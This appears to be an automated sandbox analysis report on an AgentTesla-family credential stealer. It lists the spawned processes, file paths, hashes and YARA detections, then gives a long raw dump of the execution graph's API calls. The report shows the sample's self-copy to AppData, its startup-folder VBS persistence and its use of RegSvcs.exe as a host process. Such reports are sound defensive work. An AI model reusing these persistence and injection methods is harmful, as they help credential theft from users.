                                  Start time:11:51:18
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\XoRPyi5s1i.exe"
                                  Imagebase:0x130000
                                  File size:550'912 bytes
                                  MD5 hash:FC76D8B178C0AA094EBA5FEA74E82614
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:11:51:20
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\XoRPyi5s1i.exe"
                                  Imagebase:0xfd0000
                                  File size:550'912 bytes
                                  MD5 hash:FC76D8B178C0AA094EBA5FEA74E82614
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 63%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:3
                                  Start time:11:51:22
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\XoRPyi5s1i.exe"
                                  Imagebase:0x250000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:11:51:32
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                                  Imagebase:0x7ff646e40000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:11:51:33
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0xfd0000
                                  File size:550'912 bytes
                                  MD5 hash:FC76D8B178C0AA094EBA5FEA74E82614
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                  Target ID:7
                                  Start time:11:51:34
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0xd90000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:3.8%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:6.9%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:53
API calls 95344->95347 95346 136eed 48 API calls 95346->95357 95347->95358 95349 13d7f7 48 API calls 95349->95357 95350 1697ed InterlockedDecrement 95350->95357 95351 1aa873 95351->95320 95352 1aa30e 95352->95358 95539 1697ed InterlockedDecrement 95352->95539 95354 1aa973 95543 17cc5c 86 API calls 4 library calls 95354->95543 95356 1aa982 95357->95334 95357->95336 95357->95337 95357->95340 95357->95342 95357->95344 95357->95346 95357->95349 95357->95350 95357->95352 95357->95354 95357->95358 95359 1415b5 95357->95359 95537 141820 331 API calls 2 library calls 95357->95537 95538 141d10 59 API calls Mailbox 95357->95538 95358->95320 95540 17cc5c 86 API calls 4 library calls 95359->95540 95361 17b564 95360->95361 95362 17b569 95360->95362 95544 17a4d5 95361->95544 95362->95320 95566 1335fe 95364->95566 95581 18f8ae 95367->95581 95369 190d19 95369->95320 95371 17fe9c 95370->95371 95372 17fea7 95370->95372 95718 13d286 95371->95718 95376 13936c 81 API calls 95372->95376 95401 17ff3a Mailbox 95372->95401 95374 14f4ea 48 API calls 95375 17ff5f 95374->95375 95377 17ff6b 95375->95377 95728 1348ba 49 API calls 95375->95728 95378 17feca 95376->95378 95381 13936c 81 API calls 95377->95381 95723 151dfc 95378->95723 95384 17ff83 95381->95384 95383 13ce19 48 API calls 95386 17fef3 95383->95386 95707 134550 95384->95707 95388 13518c 48 API calls 95386->95388 95391 17ff01 95388->95391 95389 17ff96 GetLastError 95392 17ffaf 95389->95392 95390 17ffca 95396 17fff5 95390->95396 95397 180011 95390->95397 95393 17ff33 95391->95393 95726 176514 GetFileAttributesW FindFirstFileW FindClose 95391->95726 95404 17ff43 Mailbox 95392->95404 95729 13453b CloseHandle 95392->95729 95395 13d286 48 API calls 95393->95395 95395->95401 95398 14f4ea 48 API calls 95396->95398 95399 14f4ea 48 API calls 95397->95399 95402 17fffa 95398->95402 95399->95404 95400 17ff11 95400->95393 95405 17ff15 95400->95405 95401->95374 95401->95404 95730 1929e8 48 API calls _memcpy_s 95402->95730 95404->95320 95727 176318 
52 API calls 3 library calls 95405->95727 95408 17ff1e 95408->95393 95410 13cdb9 48 API calls 95409->95410 95411 132dcd 95410->95411 95413 14f4ea 48 API calls 95411->95413 95414 1a5f6d 95411->95414 95415 132ded 95413->95415 95428 132e22 95414->95428 95829 182113 48 API calls 95414->95829 95416 132dfd 95415->95416 95825 1348ba 49 API calls 95415->95825 95418 13936c 81 API calls 95416->95418 95420 132e0b 95418->95420 95419 13d286 48 API calls 95421 1a5fb9 95419->95421 95422 134550 56 API calls 95420->95422 95423 132e31 95421->95423 95424 1a5fc1 95421->95424 95425 132e1a 95422->95425 95426 132a13 2 API calls 95423->95426 95427 13d286 48 API calls 95424->95427 95425->95414 95425->95428 95828 13453b CloseHandle 95425->95828 95429 132e38 95426->95429 95427->95429 95428->95419 95428->95423 95430 132e45 95429->95430 95431 1a5fd4 95429->95431 95433 13d7f7 48 API calls 95430->95433 95434 14f4ea 48 API calls 95431->95434 95435 132e4d 95433->95435 95436 1a5fda 95434->95436 95802 14e52c 95435->95802 95438 1a5ff3 95436->95438 95830 14eb66 SetFilePointerEx ReadFile 95436->95830 95443 1a5ff7 _memcpy_s 95438->95443 95831 17a3e3 48 API calls _memset 95438->95831 95440 132e5c 95440->95443 95826 136b68 48 API calls 95440->95826 95444 132e70 Mailbox 95445 132eb0 95444->95445 95446 134907 CloseHandle 95444->95446 95445->95320 95447 132ea2 95446->95447 95827 13453b CloseHandle 95447->95827 95450 13d7f7 48 API calls 95449->95450 95451 18f0c0 95450->95451 95452 13d7f7 48 API calls 95451->95452 95453 18f0c8 95452->95453 95454 13d7f7 48 API calls 95453->95454 95455 18f0d0 95454->95455 95456 13936c 81 API calls 95455->95456 95480 18f0de 95456->95480 95457 136a63 48 API calls 95457->95480 95458 13c799 48 API calls 95458->95480 95459 18f2cc 95460 18f2f9 Mailbox 95459->95460 95881 136b68 48 API calls 95459->95881 95460->95320 95462 18f2b3 95463 13518c 48 API calls 95462->95463 95465 18f2c0 95463->95465 95464 18f2ce 95466 13518c 48 API calls 95464->95466 95879 13510d 48 API calls Mailbox 
95465->95879 95470 18f2dd 95466->95470 95467 136eed 48 API calls 95467->95480 95468 13bdfa 48 API calls 95472 18f175 CharUpperBuffW 95468->95472 95880 13510d 48 API calls Mailbox 95470->95880 95471 13bdfa 48 API calls 95474 18f23a CharUpperBuffW 95471->95474 95868 13d645 95472->95868 95878 14d922 55 API calls 2 library calls 95474->95878 95477 13936c 81 API calls 95477->95480 95478 13518c 48 API calls 95478->95480 95479 13510d 48 API calls 95479->95480 95480->95457 95480->95458 95480->95459 95480->95460 95480->95462 95480->95464 95480->95467 95480->95468 95480->95471 95480->95477 95480->95478 95480->95479 95482 17a6fb 95481->95482 95483 14f4ea 48 API calls 95482->95483 95484 17a709 95483->95484 95485 17a717 95484->95485 95486 13d7f7 48 API calls 95484->95486 95485->95320 95486->95485 95488 18e868 95487->95488 95489 18e84e 95487->95489 95886 18ccdc 48 API calls 95488->95886 95885 17cc5c 86 API calls 4 library calls 95489->95885 95492 18e860 Mailbox 95492->95320 95493 18e871 95494 13fe30 330 API calls 95493->95494 95495 18e8cf 95494->95495 95495->95492 95496 18e96a 95495->95496 95498 18e916 95495->95498 95497 18e978 95496->95497 95501 18e9c7 95496->95501 95904 17a69d 48 API calls 95497->95904 95887 179b72 48 API calls 95498->95887 95500 18e949 95888 1445e0 95500->95888 95501->95492 95504 13936c 81 API calls 95501->95504 95507 18e9e1 95504->95507 95505 18e99b 95905 13bc74 48 API calls 95505->95905 95509 13bdfa 48 API calls 95507->95509 95508 18e9a3 Mailbox 95906 143200 331 API calls 2 library calls 95508->95906 95510 18ea05 CharUpperBuffW 95509->95510 95512 18ea1f 95510->95512 95513 18ea72 95512->95513 95514 18ea26 95512->95514 95515 13936c 81 API calls 95513->95515 95907 179b72 48 API calls 95514->95907 95516 18ea7a 95515->95516 95908 131caa 49 API calls 95516->95908 95519 18ea54 95520 1445e0 330 API calls 95519->95520 95520->95492 95521 18ea84 95521->95492 95522 13936c 81 API calls 95521->95522 95523 18ea9f 95522->95523 95909 13bc74 48 API calls 95523->95909 95525 
18eaaf 95910 143200 331 API calls 2 library calls 95525->95910 95527->95312 95528->95312 95529->95320 95530->95311 95531->95323 95532->95311 95533->95311 95534->95306 95535->95298 95536->95316 95537->95357 95538->95357 95539->95358 95540->95358 95541->95351 95542->95343 95543->95356 95545 17a4ec 95544->95545 95556 17a5ee 95544->95556 95546 17a5d4 Mailbox 95545->95546 95548 17a58b 95545->95548 95550 17a4fd 95545->95550 95547 14f4ea 48 API calls 95546->95547 95563 17a54c _memcpy_s Mailbox 95547->95563 95549 14f4ea 48 API calls 95548->95549 95549->95563 95551 14f4ea 48 API calls 95550->95551 95561 17a51a 95550->95561 95551->95561 95552 17a555 95557 14f4ea 48 API calls 95552->95557 95553 17a545 95555 14f4ea 48 API calls 95553->95555 95554 14f4ea 48 API calls 95554->95556 95555->95563 95556->95362 95558 17a55b 95557->95558 95564 179d2d 48 API calls 95558->95564 95560 17a567 95565 14e65e 50 API calls 95560->95565 95561->95552 95561->95553 95561->95563 95563->95554 95564->95560 95565->95563 95571 1346ce 95566->95571 95569 1346ce 2 API calls 95570 132a1b 95569->95570 95570->95320 95578 1346e8 95571->95578 95572 1a40d0 95580 134798 SetFilePointerEx 95572->95580 95573 13476d SetFilePointerEx 95579 134798 SetFilePointerEx 95573->95579 95576 13361f 95576->95569 95577 1a40ea 95578->95572 95578->95573 95578->95576 95579->95576 95580->95577 95617 13936c 95581->95617 95583 18f8ea 95588 18f92c Mailbox 95583->95588 95637 190567 95583->95637 95585 18fb8b 95586 18fcfa 95585->95586 95593 18fb95 95585->95593 95689 190688 89 API calls Mailbox 95586->95689 95588->95369 95590 18fd07 95592 18fd13 95590->95592 95590->95593 95591 18f984 Mailbox 95591->95585 95591->95588 95594 13936c 81 API calls 95591->95594 95668 1929e8 48 API calls _memcpy_s 95591->95668 95669 18fda5 60 API calls 2 library calls 95591->95669 95592->95588 95650 18f70a 95593->95650 95594->95591 95599 18fbc9 95664 14ed18 95599->95664 95602 18fbfd 95605 14c050 48 API calls 95602->95605 95603 18fbe3 95670 17cc5c 86 API calls 4 
library calls 95603->95670 95607 18fc14 95605->95607 95606 18fbee GetCurrentProcess TerminateProcess 95606->95602 95616 18fc3e 95607->95616 95671 141b90 95607->95671 95609 18fd65 95609->95588 95613 18fd7e FreeLibrary 95609->95613 95610 18fc2d 95687 19040f 105 API calls _free 95610->95687 95611 141b90 48 API calls 95611->95616 95613->95588 95616->95609 95616->95611 95688 13dcae 50 API calls Mailbox 95616->95688 95690 19040f 105 API calls _free 95616->95690 95618 139384 95617->95618 95635 139380 95617->95635 95619 1a4cbd __i64tow 95618->95619 95620 1a4bbf 95618->95620 95621 139398 95618->95621 95628 1393b0 __itow Mailbox _wcscpy 95618->95628 95622 1a4bc8 95620->95622 95623 1a4ca5 95620->95623 95691 15172b 80 API calls 3 library calls 95621->95691 95622->95628 95629 1a4be7 95622->95629 95692 15172b 80 API calls 3 library calls 95623->95692 95625 14f4ea 48 API calls 95627 1393ba 95625->95627 95631 13ce19 48 API calls 95627->95631 95627->95635 95628->95625 95630 14f4ea 48 API calls 95629->95630 95632 1a4c04 95630->95632 95631->95635 95633 14f4ea 48 API calls 95632->95633 95634 1a4c2a 95633->95634 95634->95635 95636 13ce19 48 API calls 95634->95636 95635->95583 95636->95635 95638 13bdfa 48 API calls 95637->95638 95639 190582 CharLowerBuffW 95638->95639 95693 171f11 95639->95693 95643 13d7f7 48 API calls 95644 1905bb 95643->95644 95700 1369e9 48 API calls _memcpy_s 95644->95700 95646 19061a Mailbox 95646->95591 95647 1905d2 95648 13b18b 48 API calls 95647->95648 95649 1905de Mailbox 95648->95649 95649->95646 95701 18fda5 60 API calls 2 library calls 95649->95701 95651 18f725 95650->95651 95655 18f77a 95650->95655 95652 14f4ea 48 API calls 95651->95652 95653 18f747 95652->95653 95654 14f4ea 48 API calls 95653->95654 95653->95655 95654->95653 95656 190828 95655->95656 95657 190a53 Mailbox 95656->95657 95663 19084b _strcat _wcscpy __wsetenvp 95656->95663 95657->95599 95658 13cf93 58 API calls 95658->95663 95659 13d286 48 API calls 95659->95663 95660 13936c 81 API calls 
95660->95663 95661 15395c 47 API calls __malloc_crt 95661->95663 95663->95657 95663->95658 95663->95659 95663->95660 95663->95661 95704 178035 50 API calls __wsetenvp 95663->95704 95666 14ed2d 95664->95666 95665 14edc5 VirtualProtect 95667 14ed93 95665->95667 95666->95665 95666->95667 95667->95602 95667->95603 95668->95591 95669->95591 95670->95606 95672 141cf6 95671->95672 95674 141ba2 95671->95674 95672->95610 95673 141bae 95681 141bb9 95673->95681 95706 14c15c 48 API calls 95673->95706 95674->95673 95676 14f4ea 48 API calls 95674->95676 95677 1a49c4 95676->95677 95679 14f4ea 48 API calls 95677->95679 95678 141c5d 95678->95610 95686 1a49cf 95679->95686 95680 14f4ea 48 API calls 95682 141c9f 95680->95682 95681->95678 95681->95680 95683 141cb2 95682->95683 95705 132925 48 API calls 95682->95705 95683->95610 95685 14f4ea 48 API calls 95685->95686 95686->95673 95686->95685 95687->95616 95688->95616 95689->95590 95690->95616 95691->95628 95692->95628 95694 171f3b __wsetenvp 95693->95694 95695 171f79 95694->95695 95697 171f6f 95694->95697 95699 171ffa 95694->95699 95695->95643 95695->95649 95697->95695 95702 14d37a 60 API calls 95697->95702 95699->95695 95703 14d37a 60 API calls 95699->95703 95700->95647 95701->95646 95702->95697 95703->95699 95704->95663 95705->95683 95706->95681 95731 134907 95707->95731 95713 13458d 95763 1345be SetFilePointerEx SetFilePointerEx 95713->95763 95715 134594 95764 134845 SetFilePointerEx SetFilePointerEx WriteFile 95715->95764 95717 13459b 95717->95389 95717->95390 95719 13d297 95718->95719 95720 13d29c 95718->95720 95719->95720 95775 151621 48 API calls 95719->95775 95720->95372 95722 13d2d9 95722->95372 95776 151e46 95723->95776 95726->95400 95727->95408 95728->95377 95729->95404 95730->95404 95732 13455b 95731->95732 95733 134920 95731->95733 95735 1347ff 95732->95735 95733->95732 95734 134925 CloseHandle 95733->95734 95734->95732 95736 1a406e 95735->95736 95737 134818 CreateFileW 95735->95737 95738 134582 95736->95738 95739 1a4074 
CreateFileW 95736->95739 95737->95738 95738->95717 95743 1345d5 95738->95743 95739->95738 95740 1a409a 95739->95740 95741 1346ce 2 API calls 95740->95741 95742 1a40a5 95741->95742 95742->95738 95744 1345f5 95743->95744 95745 1346ce 2 API calls 95744->95745 95752 1346a2 95744->95752 95754 13464e 95744->95754 95746 13462d 95745->95746 95747 14f4ea 48 API calls 95746->95747 95748 134638 95747->95748 95765 1347b7 95748->95765 95750 1346ce 2 API calls 95750->95752 95752->95713 95755 1346ce 2 API calls 95754->95755 95762 134689 95754->95762 95756 1a3e0a 95755->95756 95757 1335fe 2 API calls 95756->95757 95758 1a3e11 95757->95758 95759 14f4ea 48 API calls 95758->95759 95760 1a3e19 95759->95760 95761 13c2e0 2 API calls 95760->95761 95761->95762 95762->95750 95763->95715 95764->95717 95766 14f4ea 48 API calls 95765->95766 95767 134642 95766->95767 95768 13c2e0 95767->95768 95769 13c354 95768->95769 95773 13c2ee 95768->95773 95774 1345a6 SetFilePointerEx 95769->95774 95770 13c317 95770->95754 95772 13c327 ReadFile 95772->95770 95772->95773 95773->95770 95773->95772 95774->95773 95775->95722 95777 151e61 95776->95777 95780 151e55 95776->95780 95800 157c0e 47 API calls __getptd_noexit 95777->95800 95779 152019 95785 151e41 95779->95785 95801 156e10 8 API calls ___wstrgtold12_l 95779->95801 95780->95777 95787 151ed4 95780->95787 95795 159d6b 47 API calls ___wstrgtold12_l 95780->95795 95783 151fa0 95783->95777 95783->95785 95788 151fb0 95783->95788 95784 151f5f 95784->95777 95786 151f7b 95784->95786 95797 159d6b 47 API calls ___wstrgtold12_l 95784->95797 95785->95383 95786->95777 95786->95785 95791 151f91 95786->95791 95787->95777 95794 151f41 95787->95794 95796 159d6b 47 API calls ___wstrgtold12_l 95787->95796 95799 159d6b 47 API calls ___wstrgtold12_l 95788->95799 95798 159d6b 47 API calls ___wstrgtold12_l 95791->95798 95794->95783 95794->95784 95795->95787 95796->95794 95797->95786 95798->95785 95799->95785 95800->95779 95801->95785 95803 14e535 95802->95803 95804 14e547 
95802->95804 95805 14e541 95803->95805 95806 14e53b 95803->95806 95807 13bcce 48 API calls 95804->95807 95808 14e63a 48 API calls 95805->95808 95832 14e63a 95806->95832 95817 175a81 95807->95817 95810 175c17 95808->95810 95813 13bf20 50 API calls 95810->95813 95811 175ab0 95811->95440 95816 175c25 95813->95816 95824 175c35 Mailbox 95816->95824 95846 175cf1 50 API calls 95816->95846 95817->95811 95844 175a27 SetFilePointerEx ReadFile 95817->95844 95845 13c799 48 API calls _memcpy_s 95817->95845 95819 1a40c9 95823 14e581 Mailbox 95823->95440 95824->95440 95825->95416 95826->95444 95827->95445 95828->95414 95829->95414 95830->95438 95831->95443 95833 14f4ea 48 API calls 95832->95833 95834 14e64d 95833->95834 95835 136b4a 48 API calls 95834->95835 95836 14e55f 95835->95836 95837 13bf20 95836->95837 95847 13c1c2 95837->95847 95839 13c2e0 2 API calls 95840 13bf31 95839->95840 95840->95839 95842 13bf66 95840->95842 95854 13bf71 95840->95854 95842->95819 95843 13c1de 50 API calls 95842->95843 95843->95823 95844->95817 95845->95817 95846->95824 95848 13c1d3 95847->95848 95849 1a3e49 95847->95849 95848->95840 95850 136b4a 48 API calls 95849->95850 95851 1a3e53 95850->95851 95852 14f4ea 48 API calls 95851->95852 95853 1a3e5f 95852->95853 95855 13bf85 95854->95855 95856 1a3d35 95854->95856 95863 13c3b9 95855->95863 95857 136b4a 48 API calls 95856->95857 95860 1a3d40 95857->95860 95859 13bf91 95859->95840 95861 14f4ea 48 API calls 95860->95861 95862 1a3d55 _memcpy_s 95861->95862 95864 13c3cf 95863->95864 95867 13c3ca _memcpy_s 95863->95867 95865 1a3e67 95864->95865 95866 14f4ea 48 API calls 95864->95866 95866->95867 95867->95859 95869 13d654 95868->95869 95877 13d67e 95868->95877 95870 13d65b 95869->95870 95874 13d6c2 95869->95874 95871 13d6ab 95870->95871 95872 13d666 95870->95872 95871->95877 95883 14dce0 53 API calls 95871->95883 95882 13d9a0 53 API calls __cinit 95872->95882 95874->95871 95884 14dce0 53 API calls 95874->95884 95877->95480 95878->95480 95879->95459 
95880->95459 95881->95460 95882->95877 95883->95877 95884->95871 95885->95492 95886->95493 95887->95500 95889 144637 95888->95889 95890 14479f 95888->95890 95891 144643 95889->95891 95892 1a6e05 95889->95892 95893 13ce19 48 API calls 95890->95893 95964 144300 331 API calls _memcpy_s 95891->95964 95895 18e822 331 API calls 95892->95895 95900 1446e4 Mailbox 95893->95900 95896 1a6e11 95895->95896 95897 144739 Mailbox 95896->95897 95965 17cc5c 86 API calls 4 library calls 95896->95965 95897->95492 95899 144659 95899->95896 95899->95897 95899->95900 95911 176524 95900->95911 95914 186ff0 95900->95914 95923 17fa0c 95900->95923 95904->95505 95905->95508 95906->95492 95907->95519 95908->95521 95909->95525 95910->95492 95966 176ca9 GetFileAttributesW 95911->95966 95915 13936c 81 API calls 95914->95915 95916 18702a 95915->95916 95970 13b470 95916->95970 95918 18705f 95921 13cdb9 48 API calls 95918->95921 95922 187063 95918->95922 95919 18703a 95919->95918 95920 13fe30 331 API calls 95919->95920 95920->95918 95921->95922 95922->95897 95924 17fa1c __ftell_nolock 95923->95924 95925 17fa44 95924->95925 95926 13d286 48 API calls 95924->95926 95927 13936c 81 API calls 95925->95927 95926->95925 95928 17fa5e 95927->95928 95929 17fa80 95928->95929 95930 17fb68 95928->95930 95939 17fb92 95928->95939 95931 13936c 81 API calls 95929->95931 96007 1341a9 95930->96007 95937 17fa8c _wcscpy _wcschr 95931->95937 95934 17fb8e 95936 13936c 81 API calls 95934->95936 95934->95939 95935 1341a9 136 API calls 95935->95934 95938 17fbc7 95936->95938 95943 17fab0 _wcscat _wcscpy 95937->95943 95947 17fade _wcscat 95937->95947 95940 151dfc __wsplitpath 47 API calls 95938->95940 95939->95897 95944 17fbeb _wcscat _wcscpy 95940->95944 95941 13936c 81 API calls 95942 17fafc _wcscpy 95941->95942 96088 1772cb GetFileAttributesW 95942->96088 95946 13936c 81 API calls 95943->95946 95952 13936c 81 API calls 95944->95952 95946->95947 95947->95941 95948 17fb1c __wsetenvp 95948->95939 95949 13936c 81 API calls 
95948->95949 95950 17fb48 95949->95950 96089 1760dd 77 API calls 4 library calls 95950->96089 95954 17fc82 95952->95954 95953 17fb5c 95953->95939 96031 17690b 95954->96031 95956 17fca2 95957 176524 3 API calls 95956->95957 95958 17fcb1 95957->95958 95959 13936c 81 API calls 95958->95959 95962 17fce2 95958->95962 95960 17fccb 95959->95960 96037 17bfa4 95960->96037 96090 134252 95962->96090 95964->95899 95965->95897 95967 176529 95966->95967 95968 176cc4 FindFirstFileW 95966->95968 95967->95897 95968->95967 95969 176cd9 FindClose 95968->95969 95969->95967 95971 136b0f 48 API calls 95970->95971 95989 13b495 95971->95989 95972 13b69b 96000 13ba85 48 API calls _memcpy_s 95972->96000 95974 13b6b5 Mailbox 95974->95919 95977 1a397b 96004 1726bc 88 API calls 4 library calls 95977->96004 95979 13b9e4 96006 1726bc 88 API calls 4 library calls 95979->96006 95981 1a3973 95981->95974 95984 13ba85 48 API calls 95984->95989 95985 1a3989 96005 13ba85 48 API calls _memcpy_s 95985->96005 95986 13bcce 48 API calls 95986->95989 95988 1a3909 95990 136b4a 48 API calls 95988->95990 95989->95972 95989->95977 95989->95979 95989->95984 95989->95986 95989->95988 95991 13bb85 48 API calls 95989->95991 95994 13bdfa 48 API calls 95989->95994 95997 1a3939 _memcpy_s 95989->95997 95998 13c413 59 API calls 95989->95998 95999 13bc74 48 API calls 95989->95999 96001 13c6a5 49 API calls 95989->96001 96002 13c799 48 API calls _memcpy_s 95989->96002 95992 1a3914 95990->95992 95991->95989 95996 14f4ea 48 API calls 95992->95996 95995 13b66c CharUpperBuffW 95994->95995 95995->95989 95996->95997 96003 1726bc 88 API calls 4 library calls 95997->96003 95998->95989 95999->95989 96000->95974 96001->95989 96002->95989 96003->95981 96004->95985 96005->95981 96006->95981 96096 134214 96007->96096 96012 1341d4 LoadLibraryExW 96106 134291 96012->96106 96013 1a4f73 96014 134252 84 API calls 96013->96014 96016 1a4f7a 96014->96016 96018 134291 3 API calls 96016->96018 96020 1a4f82 96018->96020 96132 1344ed 96020->96132 
96021 1341fb 96021->96020 96022 134207 96021->96022 96023 134252 84 API calls 96022->96023 96025 13420c 96023->96025 96025->95934 96025->95935 96028 1a4fa9 96140 134950 96028->96140 96032 176918 _wcschr __ftell_nolock 96031->96032 96033 151dfc __wsplitpath 47 API calls 96032->96033 96035 17692e _wcscat _wcscpy 96032->96035 96034 17695d 96033->96034 96036 151dfc __wsplitpath 47 API calls 96034->96036 96035->95956 96036->96035 96038 17bfb1 __ftell_nolock 96037->96038 96039 14f4ea 48 API calls 96038->96039 96040 17c00e 96039->96040 96041 1347b7 48 API calls 96040->96041 96042 17c018 96041->96042 96043 17bdb4 GetSystemTimeAsFileTime 96042->96043 96044 17c023 96043->96044 96045 134517 83 API calls 96044->96045 96046 17c036 _wcscmp 96045->96046 96047 17c107 96046->96047 96048 17c05a 96046->96048 96049 17c56d 94 API calls 96047->96049 96648 17c56d 96048->96648 96065 17c0d3 _wcscat 96049->96065 96052 151dfc __wsplitpath 47 API calls 96057 17c088 _wcscat _wcscpy 96052->96057 96053 1344ed 64 API calls 96054 17c12c 96053->96054 96056 1344ed 64 API calls 96054->96056 96055 17c110 96055->95962 96058 17c13c 96056->96058 96060 151dfc __wsplitpath 47 API calls 96057->96060 96059 1344ed 64 API calls 96058->96059 96061 17c157 96059->96061 96060->96065 96062 1344ed 64 API calls 96061->96062 96063 17c167 96062->96063 96064 1344ed 64 API calls 96063->96064 96066 17c182 96064->96066 96065->96053 96065->96055 96067 1344ed 64 API calls 96066->96067 96068 17c192 96067->96068 96069 1344ed 64 API calls 96068->96069 96070 17c1a2 96069->96070 96071 1344ed 64 API calls 96070->96071 96072 17c1b2 96071->96072 96618 17c71a GetTempPathW GetTempFileNameW 96072->96618 96074 17c1be 96075 153499 117 API calls 96074->96075 96077 17c1cf 96075->96077 96077->96055 96079 1344ed 64 API calls 96077->96079 96087 17c289 96077->96087 96619 152aae 96077->96619 96078 17c294 96078->96055 96080 17c342 CopyFileW 96078->96080 96084 17c2b8 96078->96084 96079->96077 96081 17c32d 96080->96081 96082 17c358 96080->96082 
